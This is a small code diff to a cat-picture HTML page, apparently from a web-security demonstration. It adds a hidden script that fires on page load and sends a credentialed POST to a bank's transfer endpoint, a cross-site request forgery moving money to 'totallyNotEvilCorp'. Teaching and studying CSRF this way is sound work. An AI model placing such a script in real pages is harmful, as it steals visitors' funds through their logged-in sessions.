--- a/evil/catpictures.html
+++ b/evil/catpictures.html
@@ -8,11 +8,18 @@
     <img src="https://images.unsplash.com/photo-1543852786-1cf6624b9987?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=500&q=60" />
     <img src="https://images.unsplash.com/photo-1548247416-ec66f4900b2e?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjEyMDd9&auto=format&fit=crop&w=500&q=60" />
     <script>
-      document.cookie = "evilcookie=evil"
-      fetch('http://localhost:9000/index.html', {
+      fetch('http://www.myrealbank.com/transfer', {
         credentials: "include",
+        method: 'post',
+        credentials: 'include',
+        body: JSON.stringify({
+          to: 'totallyNotEvilCorp',
+          howMuch: '9999999999',
+        }),
+        headers: {
+          'Content-Type': 'application/json',
+        },
       })
-
     </script>
   </body>
 </html>
